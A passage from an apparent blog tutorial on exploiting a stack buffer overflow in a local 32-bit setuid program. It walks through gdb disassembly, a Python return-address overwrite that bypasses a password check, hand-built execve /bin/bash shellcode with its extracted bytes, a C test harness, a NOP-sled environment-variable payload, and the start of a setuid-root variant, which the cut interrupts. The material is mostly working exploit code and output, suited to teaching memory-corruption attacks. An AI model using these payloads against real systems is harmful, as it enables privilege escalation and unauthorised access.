4 each time because we are on a 32 bit system. So 528 bytes and then we hijack execution, you can see this as when the application crashes the instruction that the application is trying to run is code0x41414141/code (on line 21) which is just codeAAAA/code./p pI'm going to show you 2 ways you can exploit this, the first is very easy and just involves changing the flow of the application to bypass the password authentication. First we need to find the address of the code that is run after the check, again we'll use codegdb/code for this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangdb -q ./app/span span class="code-line"span class="go"Reading symbols from /home/testuser/app...(no debugging symbols found)...done./span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"set disassembly-flavor intel/span/span span class="code-line"span class="gp gp-VirtualEnv"(gdb)/span span class="go"disassemble main/span/span span class="code-line"span class="go"Dump of assembler code for function main:/span/span span class="code-line"span class="go" 0x0804860c lt;+0gt;: push ebp/span/span span class="code-line"span class="go" 0x0804860d lt;+1gt;: mov ebp,esp/span/span span class="code-line"span class="go" 0x0804860f lt;+3gt;: and esp,0xfffffff0/span/span span class="code-line"span class="go" 0x08048612 lt;+6gt;: sub esp,0x20/span/span span class="code-line"span class="go" 0x08048615 lt;+9gt;: cmp DWORD PTR [ebp+0x8],0x1/span/span span class="code-line"span class="go" 0x08048619 lt;+13gt;: jg 0x804864c lt;main+64gt;/span/span span class="code-line"span class="go" 0x0804861b lt;+15gt;: mov DWORD PTR [esp],0x80487f0/span/span span class="code-line"span class="go" 0x08048622 lt;+22gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048627 lt;+27gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804862a lt;+30gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804862c lt;+32gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804862f lt;+35gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048634 lt;+40gt;: mov DWORD PTR [esp],0x80487f8/span/span span class="code-line"span class="go" 0x0804863b lt;+47gt;: call 0x80484a0 lt;puts@pltgt;/span/span span class="code-line"span class="go" 0x08048640 lt;+52gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048647 lt;+59gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804864c lt;+64gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x0804864f lt;+67gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048652 lt;+70gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x08048654 lt;+72gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x08048657 lt;+75gt;: call 0x80486a2 lt;checkpassgt;/span/span span class="code-line"span class="go" 0x0804865c lt;+80gt;: mov DWORD PTR [esp+0x1c],eax/span/span span class="code-line"span class="go" 0x08048660 lt;+84gt;: cmp DWORD PTR [esp+0x1c],0x0/span/span span class="code-line"span class="go" 0x08048665 lt;+89gt;: je 0x804869b lt;main+143gt;/span/span span class="code-line"span class="go" 0x08048667 lt;+91gt;: mov DWORD PTR [esp],0x8048804/span/span span class="code-line"span class="go" 0x0804866e lt;+98gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048673 lt;+103gt;: mov eax,DWORD PTR [ebp+0xc]/span/span span class="code-line"span class="go" 0x08048676 lt;+106gt;: add eax,0x4/span/span span class="code-line"span class="go" 0x08048679 lt;+109gt;: mov eax,DWORD PTR [eax]/span/span span class="code-line"span class="go" 0x0804867b lt;+111gt;: mov DWORD PTR [esp],eax/span/span span class="code-line"span class="go" 0x0804867e lt;+114gt;: call 0x8048470 lt;printf@pltgt;/span/span span class="code-line"span class="go" 0x08048683 lt;+119gt;: mov DWORD PTR [esp],0xa/span/span span class="code-line"span class="go" 0x0804868a lt;+126gt;: call 0x8048500 lt;putchar@pltgt;/span/span span class="code-line"span class="go" 0x0804868f lt;+131gt;: mov DWORD PTR [esp],0x1/span/span span class="code-line"span class="go" 0x08048696 lt;+138gt;: call 0x80484c0 lt;exit@pltgt;/span/span span class="code-line"span class="go" 0x0804869b lt;+143gt;: call 0x80486f0 lt;printfilegt;/span/span span class="code-line"span class="go" 0x080486a0 lt;+148gt;: leave /span/span span class="code-line"span class="go" 0x080486a1 lt;+149gt;: ret /span/span span class="code-line"span class="go"End of assembler dump./span/span span class="code-line"/code/pre/div /td/tr/table pI use the code-q/code option to codegdb/code to supress the informational message that it normally splits out on started, I then set the disassembly flavor to codeintel/code format because codegdb/code defaults to ATamp;T format and I prefer intel./p pThe call to codeprintfile/code on line 41 looks like a good choice to jump to and as we can see it is at address code0x0804869b/code. All we need to do is put this address in, in reverse due to a href="https://en.wikipedia.org/wiki/Endianness#Little-endian" target="_blank"little endian/a, after 528 bytes, heres how:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x9b\x86\x04\x08quot;#39;/spanspan class="o")/span/span span class="code-line"span class="go"This is a top secret file!/span/span span class="code-line"span class="go"Only people with the password should be able to view this file!/span/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pWe still get a segmentation fault but it outputs the contents of the file meaning we've circumvented the password protection./p h2Developing Shellcode / Improving Exploitation/h2 pNow I'm going to show you how to use this to run your own code as root. First we need some code to run. I've written a quick a href="https://en.wikipedia.org/wiki/Assembly_language" target="_blank"assembly/a application in a href="http://www.intel.com/content/www/us/en/processors/architectures-software-developer-manuals.html?iid=tech_vt_tech+64-32_manuals" target="_blank"IA32 format/a which just runs the execve a href="https://en.wikipedia.org/wiki/System_call" target="_blank"system call/a with /bin/bash as its argument (for more information on execve itself see a href="http://linux.die.net/man/2/execve" target="_blank"man execve/a):/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="c1"; run /bin/bash/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"global/spanspan class="w" /spanspan class="nv"_start/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="k"section/spanspan class="w" /spanspan class="nv".text/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"_start:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"jmp/spanspan class="w" /spanspan class="nv"short/spanspan class="w" /spanspan class="nv"Call_shellcode/spanspan class="w" /spanspan class="c1"; jump to where our string is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"pop/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; pop the address of our string into ebx/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; which is the first argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"eax/spanspan class="p",/spanspan class="w" /spanspan class="nb"eax/spanspan class="w" /spanspan class="c1"; zero out the eax register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"9/spanspan class="p"],/spanspan class="w" /spanspan class="nb"al/spanspan class="w" /spanspan class="c1"; put a 0 where the A is to null/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; terminate the /bin/bash string/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="nb"al/spanspan class="p",/spanspan class="w" /spanspan class="mh"0xb/spanspan class="w" /spanspan class="c1"; put the sys call number 11 into eax/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ebx/spanspan class="w" /spanspan class="c1"; put a pointer to the beginning/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; of the string where the BBBB is/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"xor/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; zero out the ecx register/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"mov/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"],/spanspan class="w" /spanspan class="nb"ecx/spanspan class="w" /spanspan class="c1"; replace the CCCC with 0000/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"ecx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"10/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to BBBB into ecx the second/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"lea/spanspan class="w" /spanspan class="nb"edx/spanspan class="p",/spanspan class="w" /spanspan class="p"[/spanspan class="nb"ebx/spanspan class="w" /spanspan class="o"+/spanspan class="mi"14/spanspan class="p"]/spanspan class="w" /spanspan class="c1"; load the address that used to/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; point to CCCC into edx the third/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; argument to execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="nf"int/spanspan class="w" /spanspan class="mh"0x80/spanspan class="w" /spanspan class="c1"; execute the syscall execve/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="nl"Call_shellcode:/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nf"call/spanspan class="w" /spanspan class="nv"shellcode/spanspan class="w" /spanspan class="c1"; call the start of the actual application/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="nl"shell:/spanspan class="w" /spanspan class="kd"db/spanspan class="w" /spanspan class="s"quot;/bin/bashABBBBCCCCquot;/spanspan class="w" /spanspan class="c1"; our string of/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="c1"; arguments to execve/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pA system call works by loading the sys call number into the eax register, putting the 1st, 2nd and 3rd arguments into the ebx, ecx, edx registers respectively; and then running codeint 0x80/code to execute the system call. To find the sys call number do this:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangrep execve /usr/include/i386-linux-gnu/asm/unistd_32.h/span span class="code-line"span class="gp"#/spandefine __NR_execve span class="m"11/span/span span class="code-line"/code/pre/div /td/tr/table pThis means execve is 11 or 0xb in hex./p pIn this shellcode I'm using the jmp-call-pop technique to get the address of the string and the list of arguments (When you do a call instruction, the address of the next instruction is pushed onto the stack), this makes the code position independent. So we now need to extract this shellcode:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spannasm -f elf32 -o shell.o shell.nasm/span span class="code-line"span class="gp"testuser@dev:~$ /spanld -o shell shell.o/span span class="code-line"span class="gp"testuser@dev:~$ /spanobjdump -d ./shellspan class="p"|/spangrep span class="s1"#39;[0-9a-f]:#39;/spanspan class="p"|/spangrep -v span class="s1"#39;file#39;/spanspan class="p"|/spancut -f2 -d:span class="p"|/spancut -f1-6 -dspan class="s1"#39; #39;/spanspan class="p"|/spantr -s span class="s1"#39; #39;/spanspan class="p"|/spantr span class="s1"#39;\t#39;/span span class="s1"#39; #39;/spanspan class="p"|/spansed span class="s1"#39;s/ $//g#39;/spanspan class="p"|/spansed span class="s1"#39;s/ /\\x/g#39;/spanspan class="p"|/spanpaste -d span class="s1"#39;#39;/span -s span class="p"|/spansed span class="s1"#39;s/^/quot;/#39;/spanspan class="p"|/spansed span class="s1"#39;s/$/quot;/g#39;/span/span span class="code-line"span class="go"quot;\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;/span/span span class="code-line"/code/pre/div /td/tr/table pWe have shellcode now but we should test it to make sure it works, the following C application can do that:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"unsigned/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="n"code/spanspan class="p"[]/spanspan class="w" /spanspan class="o"=/spanspan class="w" /span\/span span class="code-line"span class="s"quot;/spanspan class="se"\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="s"quot;/spanspan class="se"\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="s"quot;/spanspan class="se"\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f/spanspan class="s"quot;/spanspan class="w"/span/span span class="code-line"span class="err"\/spanspan class="n"x62/spanspan class="err"\/spanspan class="n"x61/spanspan class="err"\/spanspan class="n"x73/spanspan class="err"\/spanspan class="n"x68/spanspan class="err"\/spanspan class="n"x41/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x42/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="err"\/spanspan class="n"x43/spanspan class="s"quot;;/span/span span class="code-line"/span span class="code-line"span class="n"main/spanspan class="p"()/spanspan class="w"/span/span span class="code-line"span class="p"{/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Shellcode Length: %d/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"code/spanspan class="p"));/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="kt"int/spanspan class="w" /spanspan class="p"(/spanspan class="o"*/spanspan class="n"ret/spanspan class="p")()/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="p"(/spanspan class="kt"int/spanspan class="p"(/spanspan class="o"*/spanspan class="p")())/spanspan class="n"code/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="n"ret/spanspan class="p"();/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pI've split it up onto multiple lines here for readability. Compiling it and running it:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangcc -z execstack -o shellcode shellcode.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./shellcode/span span class="code-line"span class="go"Shellcode Length: 49/span/span span class="code-line"span class="gp"testuser@dev:/home/testuser$/span/span span class="code-line"/code/pre/div /td/tr/table pIt worked, the application codeshellcode/code just sets the return value of the main function to the address of the beginning of our shellcode which run's it because you can't just run it manually:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /span./shell/span span class="code-line"span class="go"Segmentation fault/span/span span class="code-line"/code/pre/div /td/tr/table pNow we need to figure out a way to put our shellcode in memory and find its address to hijack execution of our vulnerable application with. We can put it in an environment varable and use a href="http://linux.die.net/man/3/getenv" target="_blank"getenv/a to get its address, here is how we put it into an environment variable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spanspan class="nb"export/span span class="nv"SHELLCODE/spanspan class="o"=/spanspan class="k"$(/spanpython -c span class="s1"#39;print quot;\x90quot; * 500 + quot;\xeb\x18\x5b\x31\xc0\x88\x43\x09\xb0\x0b\x89\x5b\x0a\x31\xc9\x89\x4b\x0e\x8d\x4b\x0a\x8d\x53\x0e\xcd\x80\xe8\xe3\xff\xff\xff\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68\x41\x42\x42\x42\x42\x43\x43\x43\x43quot;#39;/spanspan class="k")/span/span span class="code-line"/code/pre/div /td/tr/table pHere is another C application that we can use to get the address of an environment variable in the memory of another application:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdio.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;stdlib.hgt;/spanspan class="cp"/span/span span class="code-line"span class="cp"#include/spanspan class="w" /spanspan class="cpf"lt;string.hgt;/spanspan class="cp"/span/span span class="code-line"/span span class="code-line"span class="kt"int/spanspan class="w" /spanspan class="nf"main/spanspan class="p"(/spanspan class="kt"int/spanspan class="w" /spanspan class="n"argc/spanspan class="p",/spanspan class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"argv/spanspan class="p"[])/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="kt"char/spanspan class="w" /spanspan class="o"*/spanspan class="n"ptr/spanspan class="p";/spanspan class="w"/span/span span class="code-line"/span span class="code-line"span class="w" /spanspan class="k"if/spanspan class="p"(/spanspan class="n"argc/spanspan class="w" /spanspan class="o"lt;/spanspan class="w" /spanspan class="mi"3/spanspan class="p")/spanspan class="w" /spanspan class="p"{/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;Usage: %s lt;environment variablegt; lt;target program namegt;/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"]);/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"exit/spanspan class="p"(/spanspan class="mi"0/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="p"}/spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"ptr/spanspan class="w" /spanspan class="o"=/spanspan class="w" /spanspan class="n"getenv/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"]);/spanspan class="w" /spanspan class="cm"/* get env var location *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"ptr/spanspan class="w" /spanspan class="o"+=/spanspan class="w" /spanspan class="p"(/spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"0/spanspan class="p"])/spanspan class="w" /spanspan class="o"-/spanspan class="w" /spanspan class="n"strlen/spanspan class="p"(/spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"2/spanspan class="p"]))/spanspan class="o"*/spanspan class="mi"2/spanspan class="p";/spanspan class="w" /spanspan class="cm"/* adjust for program name *//spanspan class="w"/span/span span class="code-line"span class="w" /spanspan class="n"printf/spanspan class="p"(/spanspan class="s"quot;%s will be at %p/spanspan class="se"\n/spanspan class="s"quot;/spanspan class="p",/spanspan class="w" /spanspan class="n"argv/spanspan class="p"[/spanspan class="mi"1/spanspan class="p"],/spanspan class="w" /spanspan class="n"ptr/spanspan class="p");/spanspan class="w"/span/span span class="code-line"span class="p"}/spanspan class="w"/span/span span class="code-line"/code/pre/div /td/tr/table pWe compile this application and run it with the relevent arguments:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangcc -o getenvaddr getenvaddr.c/span span class="code-line"span class="gp"testuser@dev:~$ /span./getenvaddr SHELLCODE ./app/span span class="code-line"span class="go"SHELLCODE will be at 0xbffff774/span/span span class="code-line"/code/pre/div /td/tr/table pGreat! Nearly there, we've got the address of our shellcode now to use it. We will hijack the execution flow as we did before but this time we will point to the address of our environment variable:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/span span class="code-line"span class="normal"4/span/span span class="code-line"span class="normal"5/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ ./app $/spanspan class="o"(/spanpython -c span class="s1"#39;print quot;Aquot; * 528 + quot;\x74\xf7\xff\xbfquot;#39;/spanspan class="o")/span/span span class="code-line"span class="go"bash-4.2$ whoami/span/span span class="code-line"span class="go"testuser/span/span span class="code-line"span class="go"bash-4.2$ cat secret.txt/span/span span class="code-line"span class="go"cat: secret.txt: Permission denied/span/span span class="code-line"/code/pre/div /td/tr/table pDamn! So it didn't work. It must be dropping privileges, no need to worry, but we now to to change our shellcode to run the setuid system call before executing execve and set the uid to 0 (or root) (for more information on setuid see a href="http://linux.die.net/man/2/setuid" target="_blank"man setuid/a). First we need to find out the sys call number:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal"1/span/span span class="code-line"span class="normal"2/span/span span class="code-line"span class="normal"3/span/pre/div/tdtd class="code"div class="highlight"prespan class="code-line"span/spancodespan class="gp"testuser@dev:~$ /spangrep setuid /usr/include/i386-linux-gnu/asm/unistd_32.h/span span class="code-line"span class="gp"#/spandefine __NR_setuid span class="m"23/span/span span class="code-line"span class="gp"#/spandefine __NR_setuid32 span class="m"213/span/span span class="code-line"/code/pre/div /td/tr/table pThe sys call number is 23 or 0x17 in hex, our modified shellcode is:/p table class="highlighttable"trtd class="linenos"div class="linenodiv"prespan class="code-line"span class="normal" 1/span/span span class="code-line"span class="normal" 2/span/span span class="code-line"span class="normal" 3/span/span span class="code-line"span class="normal" 4/span/span span class="code-line"span class="normal" 5/span/span span class="code-line"span class="normal" 6/span/span span class="code-line"span class="normal" 7/span/span span class="code-line"span class="normal" 8/span/span span class="code-line"span class="normal" 9/span/span span class="code-line"span class="normal"10/span/span span class="code-line"span class="normal"11/span/span span class="code-line"span class="normal"12/span/span span class="code-line"span class="normal"13/span/span span class="code-line"span class="normal"14/span/span span class="code-line"span class="normal"15/span/span span class="code-line"span class="normal"16/span/span span class="code-line"span class="normal"17/span/span span class="code-line"span class="normal"18/span/span span class="code-line"span class="normal"19/span/span span class="code-line"span class="normal"20/span/span span class="code-line"span class="normal"21/span/span span class="code-line"span class="normal"22/span/span span class="code-line"span class="normal"23/span/span span class="code-line"span class="normal"24/span/span span class="code-line"span class="normal"25/span/span span class="code-line"span class="normal"26/span/span span class="code-line"span class="normal"27/span/span span class="code-line"span class="normal"28/span/span span class="code-line"span class="normal"29/span/span span class="code-line"span class="normal"30/span/span span class="code-line"span class="normal"31/span/span span class="code-line"span class="normal"32/span/span span class="code-line"span class="normal"33/span/span span class="code-line"span class="normal"34/span/span span class="code-line"span class="normal"35/span/span span class="code-line"span class="normal"36/span/span span class="code-line"span class="normal"37/span/span span class="code-line"span class="normal"38/span/span span class="code-line"span class="normal"39/span/span span class="code-line"span class="normal"40/span/span span class="code-line"span class="normal"41/span/span span class="code-line"span class="normal"42/span/span span class="code-line"span class="normal"43/span/span span class="code-line"span class="normal"44/span/span span class="code-line"span class="normal"45/span/span span class="code-line"span class="normal"46/span/span span class="code-line"span class="normal"47/span/span span class="code-line"span 